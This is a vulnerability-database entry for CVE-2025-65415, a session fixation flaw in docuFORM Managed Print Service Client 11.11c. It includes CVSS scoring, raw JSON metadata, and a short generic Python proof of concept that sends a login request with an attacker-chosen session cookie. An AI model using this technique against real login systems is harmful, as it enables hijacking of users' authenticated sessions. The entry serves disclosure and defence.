Security Vulnerability Report
中文
CVE-2025-65415 CVSS 5.4 MEDIUM

CVE-2025-65415

Published: 2026-05-11 16:17:29
Last Modified: 2026-05-12 15:05:31

Description

docuFORM Managed Print Service Client 11.11c is vulnerable to a session fixation attack via the login page of the application.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

docuFORM Managed Print Service Client 11.11c

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for Session Fixation # Attacker sets a session ID and tricks the user into logging in with it. import requests target_login = "https://target-app/login" fixed_session_id = "attacker_controlled_session_123" # Step 1: Attacker sends link to victim with the fixed session ID # Link: https://target-app/login;jsessionid=attacker_controlled_session_123 # Step 2: Victim logs in using the attacker's session ID login_data = { "username": "victim_user", "password": "victim_password" } # The cookie containing the fixed ID is sent with the login request cookies = { "JSESSIONID": fixed_session_id } response = requests.post(target_login, data=login_data, cookies=cookies) # Step 3: Verify if the session is fixed (server accepts the ID) if response.status_code == 200 and fixed_session_id in response.cookies.get("JSESSIONID", ""): print(f"Vulnerable: Session ID remains {fixed_session_id} after login.") print("Attacker can now authenticate using this ID.") else: print("Mitigated: Session ID changed after login.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65415", "sourceIdentifier": "[email protected]", "published": "2026-05-11T16:17:28.943", "lastModified": "2026-05-12T15:05:31.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "docuFORM Managed Print Service Client 11.11c is vulnerable to a session fixation attack via the login page of the application."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-384"}]}], "references": [{"url": "https://ZeroBreach.de", "source": "[email protected]"}, {"url": "https://gist.github.com/ZeroBreach-GmbH/459cad8e01fe99c6998bea556ac0dcb8", "source": "[email protected]"}, {"url": "https://www.docuform.de/", "source": "[email protected]"}]}}